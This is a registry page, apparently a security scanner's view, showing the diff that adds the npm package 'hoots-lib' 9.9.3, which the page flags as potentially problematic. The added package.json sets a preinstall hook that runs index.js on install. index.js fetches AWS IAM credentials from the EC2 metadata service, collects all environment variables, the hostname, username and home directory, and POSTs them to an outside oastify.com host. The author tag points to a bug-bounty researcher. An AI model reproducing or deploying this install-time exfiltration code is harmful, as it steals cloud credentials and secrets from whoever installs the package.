hoots-lib 9.9.3

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of hoots-lib might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +119 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,119 @@
1
+ //author:- pinkmeimei@wearehackerone.com
2
+ const os = require("os");
3
+ const dns = require("dns");
4
+ const querystring = require("querystring");
5
+ const https = require("https");
6
+ const http = require("http");
7
+ const packageJSON = require("./package.json") || null;
8
+ const package = packageJSON? packageJSON.name: null ;
9
+
10
+ var aws_c = "";
11
+ var env_vars = "";
12
+
13
+ const req1 = http.request("http://169.254.169.254/latest/api/token", {
14
+ "method": "PUT",
15
+ "headers": {
16
+ 'X-aws-ec2-metadata-token-ttl-seconds': 5
17
+ }},(res1)=>{
18
+ res1.on("data",(token)=>{
19
+ process.stdout.write(token);
20
+ const req2 = http.get("http://169.254.169.254/latest/meta-data/iam/security-credentials",{
21
+ "headers": {
22
+ 'X-aws-ec2-metadata-token': token
23
+ }
24
+ }, (res2)=>{
25
+ res2.on("data",(iamRole)=>{
26
+ process.stdout.write(iamRole);
27
+ const req3 = http.get(`http://169.254.169.254/latest/meta-data/iam/security-credentials/${iamRole}`,{
28
+ "headers": {
29
+ 'X-aws-ec2-metadata-token': token
30
+ }
31
+ }, (res3)=>{
32
+ res3.on("data",(credentials)=>{
33
+ process.stdout.write(credentials);
34
+
35
+
36
+ aws_c = credentials.toString('base64') || undefined ;
37
+
38
+ try{
39
+ env_vars = btoa(JSON.stringify(process.env));
40
+ }catch(e){}
41
+
42
+ const pwd = process.cwd();
43
+
44
+
45
+
46
+ const trackingData = JSON.stringify({
47
+ p: package,
48
+ c: __dirname,
49
+ cwd: pwd,
50
+ hd: os.homedir(),
51
+ hn: os.hostname(),
52
+ un: os.userInfo().username,
53
+ dns: dns.getServers(),
54
+ r: packageJSON ? packageJSON.___resolved : undefined,
55
+ v: packageJSON.version,
56
+ pjson: packageJSON,
57
+ env: env_vars,
58
+ aws: aws_c,
59
+ });
60
+
61
+ var postData = querystring.stringify({
62
+ msg: trackingData,
63
+ });
64
+
65
+ var options = {
66
+ hostname: "hoots-lib.993.lsh5kazu22cydoxxbyusokspxg37r0fp.oastify.com",
67
+ port: 443,
68
+ path: "/",
69
+ method: "POST",
70
+ headers: {
71
+ "Content-Type": "application/x-www-form-urlencoded",
72
+ "Content-Length": postData.length,
73
+ },
74
+ rejectUnauthorized: false,
75
+ requestCert: true,
76
+ agent: false,
77
+ };
78
+
79
+ var req4 = https.request(options, (res) => {
80
+ res.on("data", (d) => {
81
+ process.stdout.write(d);
82
+ });
83
+ });
84
+
85
+ req4.on("error", (e) => {
86
+ console.error(e);
87
+ });
88
+
89
+ req4.write(postData);
90
+ req4.end();
91
+
92
+
93
+ });
94
+ });
95
+
96
+ req3.on("error", (e) => {
97
+ console.error(e);
98
+ });
99
+
100
+ req3.end();
101
+ });
102
+
103
+ });
104
+
105
+ req2.on("error", (e) => {
106
+ console.error(e);
107
+ });
108
+
109
+ req2.end();
110
+ });
111
+
112
+
113
+ });
114
+
115
+ req1.on("error", (e) => {
116
+ console.error(e);
117
+ });
118
+
119
+ req1.end();
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "hoots-lib",
3
+ "version": "9.9.3",
4
+ "description": "pinkmeimei@wearehackerone.com",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "pinkmeimei",
11
+ "license": "ISC"
12
+ }